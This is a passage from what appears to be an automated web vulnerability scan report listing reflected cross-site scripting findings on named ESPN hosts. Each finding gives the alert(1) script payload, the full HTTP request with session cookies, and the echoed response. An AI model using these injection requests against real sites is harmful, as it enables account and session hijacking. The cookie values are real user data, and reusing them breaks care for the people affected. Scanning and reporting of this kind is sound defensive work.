The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c9679<script>alert(1)</script>3c99b6ca0a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mpcommons/static/cssc9679<script>alert(1)</script>3c99b6ca0a5/main HTTP/1.1
Host: g.espncdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 147
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Date: Sat, 06 Nov 2010 16:11:32 GMT
Connection: close

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/cssc9679<script>alert(1)</script>3c99b6ca0a5/main</BODY></HTML>

5.31. http://g.espncdn.com/mpcommons/static/css/main [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.espncdn.com
Path:   /mpcommons/static/css/main

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 91bdc<script>alert(1)</script>182530dbb64 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mpcommons/static/css/main91bdc<script>alert(1)</script>182530dbb64 HTTP/1.1
Host: g.espncdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 147
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Date: Sat, 06 Nov 2010 16:11:35 GMT
Connection: close

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/css/main91bdc<script>alert(1)</script>182530dbb64</BODY></HTML>

5.32. http://g.espncdn.com/mpcommons/static/js/main [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.espncdn.com
Path:   /mpcommons/static/js/main

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a89ef<script>alert(1)</script>59ae141c417 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mpcommons/statica89ef<script>alert(1)</script>59ae141c417/js/main HTTP/1.1
Host: g.espncdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 146
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Date: Sat, 06 Nov 2010 16:11:34 GMT
Connection: close

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/statica89ef<script>alert(1)</script>59ae141c417/js/main</BODY></HTML>

5.33. http://g.espncdn.com/mpcommons/static/js/main [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.espncdn.com
Path:   /mpcommons/static/js/main

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d1cb<script>alert(1)</script>4c687beadc5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mpcommons/static/js5d1cb<script>alert(1)</script>4c687beadc5/main HTTP/1.1
Host: g.espncdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 146
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Date: Sat, 06 Nov 2010 16:11:37 GMT
Connection: close

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/js5d1cb<script>alert(1)</script>4c687beadc5/main</BODY></HTML>

5.34. http://g.espncdn.com/mpcommons/static/js/main [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.espncdn.com
Path:   /mpcommons/static/js/main

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd44f<script>alert(1)</script>1c2bc0e9cef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mpcommons/static/js/maincd44f<script>alert(1)</script>1c2bc0e9cef HTTP/1.1
Host: g.espncdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 146
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Date: Sat, 06 Nov 2010 16:11:41 GMT
Connection: close

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/js/maincd44f<script>alert(1)</script>1c2bc0e9cef</BODY></HTML>

5.35. http://games.espn.go.com/frontpage [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /frontpage

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b155<script>alert(1)</script>4134dc3e7cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /frontpage7b155<script>alert(1)</script>4134dc3e7cb HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 131
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage7b155<script>alert(1)</script>4134dc3e7cb</BODY></HTML>

5.36. http://games.espn.go.com/frontpage/basketball [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /frontpage/basketball

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f36c<script>alert(1)</script>45bed4dd97c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /frontpage9f36c<script>alert(1)</script>45bed4dd97c/basketball HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 142
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage9f36c<script>alert(1)</script>45bed4dd97c/basketball</BODY></HTML>

5.37. http://games.espn.go.com/frontpage/basketball [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /frontpage/basketball

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7707<script>alert(1)</script>fed908440a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /frontpage/basketballb7707<script>alert(1)</script>fed908440a5 HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 142
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage/basketballb7707<script>alert(1)</script>fed908440a5</BODY></HTML>

5.38. http://games.espn.go.com/pokerpickem/en/frontpage [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /pokerpickem/en/frontpage

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dd1f8<script>alert(1)</script>3870a2a6f26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pokerpickem/endd1f8<script>alert(1)</script>3870a2a6f26/frontpage HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 17807
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

       <head>
<script type="text/javascript" lang
...[SNIP]...
<h2>/pokerpickem/en/endd1f8<script>alert(1)</script>3870a2a6f26/frontpage</h2>
...[SNIP]...

5.39. http://games.espn.go.com/pokerpickem/en/frontpage [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /pokerpickem/en/frontpage

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cad91<script>alert(1)</script>aea9d8a4290 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pokerpickem/en/frontpagecad91<script>alert(1)</script>aea9d8a4290 HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 17804
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

       <head>
<script type="text/javascript" lang
...[SNIP]...
<h2>/pokerpickem/en/frontpagecad91<script>alert(1)</script>aea9d8a4290</h2>
...[SNIP]...

5.40. http://games.espn.go.com/pokerpickem/en/group [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /pokerpickem/en/group

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a748f<script>alert(1)</script>f8c10452a72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pokerpickem/ena748f<script>alert(1)</script>f8c10452a72/group HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 17803
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

       <head>
<script type="text/javascript" lang
...[SNIP]...
<h2>/pokerpickem/en/ena748f<script>alert(1)</script>f8c10452a72/group</h2>
...[SNIP]...

5.41. http://games.espn.go.com/pokerpickem/en/group [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /pokerpickem/en/group

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d225d<script>alert(1)</script>ba2a1fa4d8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pokerpickem/en/groupd225d<script>alert(1)</script>ba2a1fa4d8d HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 17800
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

       <head>
<script type="text/javascript" lang
...[SNIP]...
<h2>/pokerpickem/en/groupd225d<script>alert(1)</script>ba2a1fa4d8d</h2>
...[SNIP]...

5.42. http://games.espn.go.com/pokerpickem/en/story [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /pokerpickem/en/story

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60154<script>alert(1)</script>a8449528d68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pokerpickem/en60154<script>alert(1)</script>a8449528d68/story HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 17803
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

       <head>
<script type="text/javascript" lang
...[SNIP]...
<h2>/pokerpickem/en/en60154<script>alert(1)</script>a8449528d68/story</h2>
...[SNIP]...

5.43. http://games.espn.go.com/pokerpickem/en/story [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /pokerpickem/en/story

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 98bbc<script>alert(1)</script>d41001c2763 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

